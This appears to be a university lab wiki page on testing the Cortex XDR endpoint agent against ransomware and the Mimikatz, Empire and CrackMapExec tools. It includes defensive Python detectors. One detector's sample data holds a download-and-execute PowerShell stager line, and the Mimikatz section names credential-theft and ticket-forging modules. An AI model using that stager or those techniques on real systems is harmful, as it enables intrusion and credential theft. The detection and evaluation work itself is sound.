Endpoint security using Cortex XDR

From Embedded Lab Vienna for IoT & Security

Summary

Endpoint security is a core component of an organisation's overall security strategy. It protects the devices that users and services actually run on (laptops, desktops, smartphones and servers) against threats that compromise the confidentiality, integrity or availability of the data they hold. Cortex XDR is Palo Alto Networks' endpoint detection and response platform. Its agent combines exploit-prevention modules, a local machine-learning verdict on unknown executables, behavioural threat protection and cloud analysis in the WildFire sandbox to block malware, ransomware and the tooling used in advanced persistent threat (APT) intrusions.

Detection is not limited to file signatures. The agent records process, file, registry and network activity on the endpoint and raises an alert when that activity matches known malicious behaviour, so an unknown sample can be stopped for what it does rather than for what it looks like. Alerts are correlated into incidents in the management console, which also provides the forensic data (process trees, file and network events) and the response actions (isolating an endpoint, terminating processes, quarantining files) needed to contain and remediate an incident.

Cortex XDR is designed to work alongside other controls such as firewalls, intrusion detection and prevention systems and a SIEM, which can ingest its alerts, and it is administered from a single cloud-hosted console. In this project the agent was installed on a test notebook and evaluated against real ransomware samples and common post-exploitation tools.

Description

Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization's endpoint infrastructure.

Endpoint security pentesting can include a variety of different techniques and tools, such as:

  • Vulnerability scanning: Identifying known vulnerabilities on endpoint devices
  • Social engineering: Attempting to trick users into providing sensitive information or executing malicious code
  • Application testing: Identifying vulnerabilities in software installed on endpoint devices
  • Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means
  • Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices

The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.

It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.

It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.

Ransomware

Ransomware is malware that encrypts a victim's files and demands a payment, usually in a cryptocurrency such as Bitcoin and under a deadline, in exchange for the decryption key. The usual infection vectors are phishing e-mails with malicious attachments or links, exploitation of unpatched software and exposed remote-access services and, for worm-capable families, direct propagation to other reachable hosts. The financial and operational damage to individuals and organisations can be severe.

For a business the damage goes well beyond the ransom: operations stop while systems are rebuilt, and data that was never backed up may be lost for good. Some organisations pay because they see no faster way back into operation, even though paying funds the attackers and does not guarantee working decryption; others restore from backups or, where the encryption was implemented badly, recover with a published decryptor. Many current families add a double-extortion step: data is exfiltrated before it is encrypted and the attackers threaten to publish it if the ransom is not paid, so that backups alone no longer remove their leverage. Regular, offline or otherwise immutable backups, prompt patching of software and systems, and an endpoint agent that blocks the encryption behaviour itself are the main defences.

Cerber Ransomware

Cerber is a ransomware family first observed in early 2016 and sold as ransomware-as-a-service: affiliates distributed it and shared the proceeds with its developers. It was known for frequent repacking to evade detection and was distributed mainly through spam e-mails with malicious attachments and through exploit kits on malicious or compromised websites that exploited vulnerabilities in web browsers and browser plug-ins. Cerber did not exfiltrate data; it was a classic crypto-ransomware without the double-extortion component that only became common in later families. Once run, the malware encrypts files on the local disks and on any reachable network shares, gives them a new extension and drops ransom notes (one of them a script that reads the demand aloud via text-to-speech) instructing the victim to pay in Bitcoin through a Tor site. Paying does not guarantee the recovery of the encrypted files; restoring the data from backups or other means is the advisable approach.

WannaCry Ransomware

WannaCry is a ransomware worm that appeared on 12 May 2017 and spread worldwide within hours, disrupting businesses, hospitals (notably the UK's National Health Service) and other organisations. It propagated with EternalBlue, an exploit for a remote code execution vulnerability in Microsoft's SMBv1 implementation (CVE-2017-0144, fixed by security bulletin MS17-010) that had been developed by the US National Security Agency (NSA) and published by the Shadow Brokers group in April 2017. Because the exploit needs no user interaction, every infected machine scanned for and infected further hosts over TCP port 445, both on the local network and across the Internet. On each victim WannaCry encrypts local files and files on connected network drives, appends the .WNCRY extension and displays a ransom note demanding 300 US dollars in Bitcoin, doubling to 600 if not paid within three days and threatening to delete the files after seven. The total cost of the outbreak was estimated at more than 4 billion US dollars. Microsoft had shipped the patch in March 2017, two months before the outbreak, but a large number of systems were still unpatched or ran unsupported Windows versions, which is why the incident is cited as a lesson in patch management and in retiring legacy protocols such as SMBv1.
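The detection side of the behaviour described above, as an added example that is not part of the original page and not Cortex XDR's own (proprietary) logic: a small Python detector that flags a process rewriting many files with a new extension and ciphertext-like content. The thresholds, process names and the telemetry records are constructed for illustration.

```python
"""Ransomware-style file activity detector over constructed endpoint telemetry.

Added example for this page; it is not Cortex XDR code and the thresholds are
assumptions. Two behavioural signals are combined: a burst of rewrites from one
process that change the file extension, and written content whose Shannon
entropy is close to the 8 bits/byte that ciphertext shows.
"""
import math
import random
from collections import defaultdict

BURST_WINDOW_SEC = 60        # assumed: how long one "burst" may span
MIN_FILES_IN_BURST = 5       # assumed: distinct files rewritten before alerting
ENTROPY_THRESHOLD = 7.0      # bits/byte; documents and source code sit well below 6


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty/constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def extension_changed(before: str, after: str) -> bool:
    """True when a write/rename leaves the file with a different extension."""
    return before.rsplit(".", 1)[-1].lower() != after.rsplit(".", 1)[-1].lower()


def detect_encryption_bursts(events):
    """Return {pid: {"process": name, "files": [...]}} for every process that rewrote
    at least MIN_FILES_IN_BURST distinct files with a new extension and high-entropy
    content inside one BURST_WINDOW_SEC window.

    events: iterable of (timestamp_sec, pid, process_name, path_before, path_after, data)
    """
    hits = defaultdict(list)   # pid -> [(ts, new_path)] for extension change + high entropy
    names = {}
    for ts, pid, proc, before, after, data in events:
        names[pid] = proc
        if extension_changed(before, after) and shannon_entropy(data) >= ENTROPY_THRESHOLD:
            hits[pid].append((ts, after))

    alerts = {}
    for pid, seq in hits.items():
        seq.sort()
        start = 0
        for end in range(len(seq)):                       # sliding time window
            while seq[end][0] - seq[start][0] > BURST_WINDOW_SEC:
                start += 1
            if len({p for _, p in seq[start:end + 1]}) >= MIN_FILES_IN_BURST:
                alerts[pid] = {"process": names[pid], "files": sorted({p for _, p in seq})}
                break
    return alerts


# ---- constructed sample telemetry (not captured from a real host) ----
_rng = random.Random(2017)   # seeded so the "ciphertext" is reproducible


def _ciphertext_like(n=2048):
    return bytes(_rng.getrandbits(8) for _ in range(n))


PLAINTEXT = b"Quarterly report: revenue grew 4% quarter over quarter. " * 40
DOCS = r"C:\Users\alice\Documents"

EVENTS = [
    # Word saving a document through a temp file: extension changes, but content is text
    (100.0, 4242, "WINWORD.EXE", DOCS + r"\~WRD0001.tmp", DOCS + r"\report.docx", PLAINTEXT),
    # An archiver producing two compressed files: high entropy, but only two files
    (150.0, 5151, "archiver.exe", DOCS + r"\logs1.txt", DOCS + r"\logs1.7z", _ciphertext_like()),
    (151.0, 5151, "archiver.exe", DOCS + r"\logs2.txt", DOCS + r"\logs2.7z", _ciphertext_like()),
]
# Eight documents rewritten to ".locked" with ciphertext-like content within eight seconds
EVENTS += [
    (200.0 + i, 6666, "invoice_reader.exe",
     DOCS + rf"\file{i}.xlsx", DOCS + rf"\file{i}.xlsx.locked", _ciphertext_like())
    for i in range(8)
]

if __name__ == "__main__":
    for pid, info in detect_encryption_bursts(EVENTS).items():
        print(f"ALERT pid={pid} {info['process']} rewrote {len(info['files'])} files")
```

Two classic false-positive sources are handled: Office applications rename temporary files (extension changes, but the content is low-entropy text) and archivers produce high-entropy output (but only a few files). Production agents add further signals, for example deletion of volume shadow copies, known ransom-note file names and honeypot files that no legitimate program should touch.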

Tools

Cortex XDR

Cortex XDR is Palo Alto Networks' extended detection and response platform. It correlates telemetry from the Cortex XDR agent on endpoints with logs from Palo Alto Networks firewalls, cloud workloads and third-party sources, and enriches it with WildFire and Unit 42 threat intelligence, to give a single view of an organisation's security posture.

On the endpoint, the agent blocks known malware, analyses unknown executables both locally with a machine-learning model and in the WildFire cloud sandbox, and stops exploit techniques and malicious behaviour (such as mass file encryption or credential theft) while they execute. Across the collected data, analytics and behavioural rules detect activity typical of ransomware and APT (Advanced Persistent Threat) intrusions, such as lateral movement and credential misuse, and group the related alerts into incidents.

Response can be automated or driven by analysts: endpoints can be isolated from the network, processes terminated, files quarantined and a remote shell opened for investigation. Agent deployment, policy, investigation and response across all users, devices and locations are handled from one cloud-hosted management console.

Mimikatz

Mimikatz (by Benjamin Delpy, "gentilkiwi") is a tool for extracting authentication material from Windows systems. Attackers use it once they have obtained administrative rights on a host to harvest the credentials of everyone who has logged on there and reuse them elsewhere in the network. Its best-known capability is reading the memory of the Local Security Authority Subsystem Service (lsass.exe), which caches the secrets of active logon sessions; it also reads the SAM database and LSA secrets from the registry and decrypts DPAPI-protected stores such as the Windows Credential Manager, which is how it reaches credentials saved by browsers and other applications.

Mimikatz can extract, among other things:

  • Plaintext passwords from memory, when the WDigest provider keeps them (off by default since Windows 8.1 / Server 2012 R2, but often re-enabled by attackers)
  • NTLM hashes of logged-on users, usable for pass-the-hash
  • Kerberos TGTs and service tickets, usable for pass-the-ticket
  • DPAPI master keys and Credential Manager / Windows Vault entries
  • Service-account and scheduled-task passwords stored as LSA secrets
  • Account hashes from a domain controller via DCSync, by requesting replication instead of touching the controller's disk

Mimikatz can also be used to perform actions such as:

  • Pass-the-hash and over-pass-the-hash: starting a process under another user's NTLM hash or AES key (sekurlsa::pth)
  • Forging Kerberos golden and silver tickets from the KRBTGT or a service-account hash (kerberos::golden)
  • Setting a user's NTLM hash directly in Active Directory (lsadump::setntlm), which amounts to changing that user's password
  • Parsing an LSASS memory dump taken on another machine (sekurlsa::minidump), so that Mimikatz itself never runs on the target

Mimikatz is a powerful and dangerous tool, and its unauthorised use is illegal in many countries. Organisations should be aware of Mimikatz and similar tools and watch for their footprint: processes opening lsass.exe with memory-read access, LSASS memory dumps written to disk, and the tool's own strings and module names. They should also reduce what it can collect by enabling Credential Guard and LSA protection (RunAsPPL), keeping WDigest disabled, avoiding interactive logons with highly privileged accounts on workstations, implementing strong access controls and patching known vulnerabilities promptly.
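Because Mimikatz's central move is opening a handle to lsass.exe with memory-read rights, the corresponding detection is worth seeing in code. The following is an added example (neither Mimikatz nor Cortex XDR logic) that triages constructed Sysmon Event ID 10 (ProcessAccess) records; the allowlist, the severity rule and the sample events are assumptions.

```python
"""Triage of Sysmon Event ID 10 (ProcessAccess) records for credential-dumping
behaviour against lsass.exe. Added example for this page, not Cortex XDR logic;
the allowlist and severity rule are assumptions to be tuned per environment."""

# Windows process access rights (winnt.h)
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF
MEMORY_ACCESS = PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Assumed allowlist of system processes that legitimately open LSASS with memory
# rights. Full lower-case paths, so a copy of svchost.exe elsewhere does not match.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def triage_lsass_access(events):
    """Return one alert per suspicious LSASS handle open.

    Suspicious = target is lsass.exe, the granted access includes memory
    read/write rights (or is PROCESS_ALL_ACCESS), and the source image is not
    allowlisted. A call trace through UNKNOWN (memory not backed by a module,
    typical of injected or reflectively loaded code) raises the severity.
    """
    alerts = []
    for e in events:
        if e.get("EventID") != 10:
            continue
        if not e["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        access = int(e["GrantedAccess"], 16)
        has_memory_rights = access == PROCESS_ALL_ACCESS or bool(access & MEMORY_ACCESS)
        source = e["SourceImage"].lower()
        if not has_memory_rights or source in ALLOWLIST:
            continue
        severity = "high" if "UNKNOWN" in e.get("CallTrace", "") else "medium"
        alerts.append({
            "source": e["SourceImage"],
            "granted_access": f"0x{access:X}",
            "severity": severity,
            "reason": "non-allowlisted process opened lsass.exe with memory access rights",
        })
    return alerts


# Constructed records using Sysmon Event ID 10 field names (not from a real host).
SAMPLE_EVENTS = [
    {   # normal: csrss keeps a full-access handle to lsass
        "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\csrsrv.dll+3e4d",
    },
    {   # normal: Task Manager queries lsass without memory rights
        "EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\Taskmgr.exe+1a2b3",
    },
    {   # sekurlsa-style read: 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION
        "EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Users\bob\Downloads\mimikatz.exe+4f1e2",
    },
    {   # renamed copy outside System32, called from unbacked memory: reflective loader
        "EventID": 10, "SourceImage": r"C:\Windows\Temp\svchost.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001F2A3B40000)",
    },
    {   # unrelated process access, ignored
        "EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
        "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF",
        "CallTrace": "",
    },
]

if __name__ == "__main__":
    for a in triage_lsass_access(SAMPLE_EVENTS):
        print(f"[{a['severity'].upper()}] {a['source']} access={a['granted_access']}: {a['reason']}")
```

The access masks 0x1010 and 0x1410 are the ones Mimikatz's sekurlsa module typically requests and are the usual starting point for rules on this event; an allowlist keyed on the full path rather than the file name is what stops a renamed binary in C:\Windows\Temp from hiding behind a trusted name.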

BC-Security / Empire

Empire is a post-exploitation command-and-control (C2) framework used by penetration testers and red teamers, and by real attackers, on systems they have already compromised. The original PowerShell Empire paired a Python server with an agent written entirely in PowerShell, which let it run on Windows without dropping a binary, execute arbitrary PowerShell in memory and reuse a large library of offensive PowerShell for privilege escalation, keylogging, network and domain reconnaissance and credential theft (it embeds Invoke-Mimikatz). Later versions, maintained by BC-Security, added Python agents for Linux and macOS.

Empire is modular: listeners define how agents call back (HTTP, HTTPS and others), stagers generate the launcher that delivers an agent to a target, and modules are scripts executed through an agent; users can add their own. Agents beacon back to the Empire server over the listener channel, which gives the operator remote control of the compromised system.

Empire is often used together with Metasploit or Cobalt Strike for initial access and with Mimikatz for credential theft in more advanced attacks.

Organisations should be aware of Empire and similar tools and take steps to detect and hinder them: monitor for hidden-window PowerShell processes started with encoded commands, enable PowerShell script block logging and AMSI so that in-memory scripts become visible, restrict PowerShell where it is not needed, implement strong access controls and keep software patched.
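Empire's classic launcher is a hidden-window, no-profile powershell.exe whose -EncodedCommand payload (Base64 of UTF-16LE text) downloads and IEX-es the agent. The added example below (not Empire code and not Cortex XDR logic) decodes such command lines and scores them; the indicator list, the scoring and the sample download URL http://10.0.0.5:8080/launcher are assumptions or constructed data.

```python
"""Decode and score PowerShell launcher command lines of the kind Empire stagers
produce. Added example for this page: not Empire code and not Cortex XDR logic.
Indicator list, scoring and the sample URL are assumptions/constructed."""
import base64
import re

# powershell.exe takes -EncodedCommand or its documented short forms -e / -ec (also
# written with "/"); the payload is Base64 of the script as UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"(?:^|\s)[-/]w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
NO_PROFILE = re.compile(r"(?:^|\s)[-/]nop(?:rofile)?\b", re.I)

INDICATORS = {   # assumed list; extend it from your own telemetry
    "downloads code": re.compile(r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "executes text as code": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "nested encoding": re.compile(r"FromBase64String", re.I),
    "in-memory assembly load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "AMSI/logging tampering": re.compile(r"AmsiUtils|amsiInitFailed|ScriptBlockLogging", re.I),
    "execution policy bypass": re.compile(r"[-/](?:ExecutionPolicy|ep|ex|exec)\s+(?:Bypass|Unrestricted)", re.I),
}


def encode_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyse_powershell(cmdline: str) -> dict:
    """Score a command line. Indicators are matched against the visible command line
    (with the Base64 blob removed) plus the decoded payload; a hidden window combined
    with -NoProfile adds one point. 0 = benign, 1-2 = suspicious, >= 3 = malicious."""
    decoded = decode_encoded_command(cmdline)
    visible = ENCODED_FLAG.sub(" ", cmdline)          # the blob itself must not trip indicators
    haystack = visible if decoded is None else visible + "\n" + decoded
    findings = [label for label, rx in INDICATORS.items() if rx.search(haystack)]
    launcher_switches = bool(HIDDEN_WINDOW.search(cmdline) and NO_PROFILE.search(cmdline))
    score = len(findings) + (1 if launcher_switches else 0)
    verdict = "malicious" if score >= 3 else "suspicious" if score else "benign"
    return {"decoded": decoded, "findings": findings, "launcher_switches": launcher_switches,
            "score": score, "verdict": verdict}


# Constructed samples (the download URL is made up; 10.0.0.5 is a private address)
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8080/launcher')"
ADMIN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running' | Select-Object Name"
SAMPLE_CMDLINES = [
    f"powershell -noP -sta -w 1 -enc {encode_powershell(STAGER)}",                         # launcher pattern
    f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {encode_powershell(ADMIN_SCRIPT)}",
    r"powershell.exe -File C:\scripts\nightly-backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyse_powershell(line)
        print(f"{r['verdict']:10} score={r['score']} findings={r['findings']}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Decoding before matching matters: the download-and-execute pattern is invisible in the raw command line, and the admin's encoded script in the second sample is legitimate but still earns a look because of the execution-policy bypass. With script block logging enabled the decoded text also appears in event 4104, which is a second place to run the same indicators.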


Porchetta-Industries / CrackMapExec

CrackMapExec (CME) is a network reconnaissance and attack-execution tool aimed at Windows and Active Directory environments, used by penetration testers and red teamers to enumerate and attack many hosts at once. Its most used protocol module is SMB (Server Message Block, the protocol behind Windows file and printer sharing and much of its remote administration), but it also ships modules for WinRM, MSSQL, LDAP and SSH, and it builds on the Impacket library for SMB authentication and remote execution.

CME can perform various tasks, including:

  • Enumerating users, groups, shares, logged-on sessions and computers across a network
  • Dumping password hashes (SAM, LSA secrets, NTDS) for offline cracking
  • Executing arbitrary commands or scripts on remote systems
  • Attempting to authenticate to remote systems with a list of provided credentials or hashes (password spraying and pass-the-hash)

CME is fast and powerful and can gather information about the systems on a network in minutes. Organisations should be aware of CME and similar tools and of the patterns they leave behind (many authentication attempts from one host, services and scheduled tasks created over SMB), monitor for that activity, implement strong access controls and keep software patched.

It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.

Pentesting With Cortex XDR

Installation

From Cortex XDR, select Endpoints → Agent Installations.
Create a new installation package.
Enter a unique Name and an optional Description to identify the installation package.
Select the Package Type:

  • Standalone Installers: for fresh installations and for upgrading Cortex XDR agents on registered endpoints that are connected to Cortex XDR.
  • Upgrade from ESM: for upgrading Traps agents that connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.
  • Kubernetes Installer (Linux only): for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.
  • Helm Installer: for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters, deployed as a Helm chart.

Specify the installation package settings.
Create the installation package.

Cortex XDR prepares your installation package and makes it available on the Agent Installations page.

Download your installation package.

When the status of the package shows Completed, right-click the agent version and click Download. For Windows endpoints, select the processor architecture. You can download the installer MSI file alone or, for Cortex XDR agents 7.4 and later, a distribution package that contains both the MSI and the latest content ZIP. The distribution package is recommended because it reduces the network load and the time needed for the initial roll-out or for major upgrades of the agent. For the benefits, workflow and requirements of this type of deployment, see the Cortex XDR Agent Administrator Guide.

For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.

For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.

Execution Phase

We executed the WannaCry and Cerber samples on the test endpoint with the Cortex XDR agent installed. The agent blocked both executions and reported them to the Cortex XDR management console, where we could analyse the blocked attacks and review the process activity recorded when the samples were detonated in WildFire, Palo Alto Networks' cloud sandbox.

Used Hardware

Notebook

Used Software

  • Cortex XDR
  • WannaCry Ransomware
  • Cerber Ransomware
  • Gentilkiwi / Mimikatz
  • BC-Security / Empire
  • Porchetta-Industries / CrackMapExec

Results

Cortex XDR prevented all of the attacks we ran, including the execution of the real ransomware samples described in the Ransomware section. For each prevention the console gave a precise analysis of the processes it considered abnormal or malicious. Behaviour associated with known exploit and attack techniques is recognised, blocked immediately and reported.
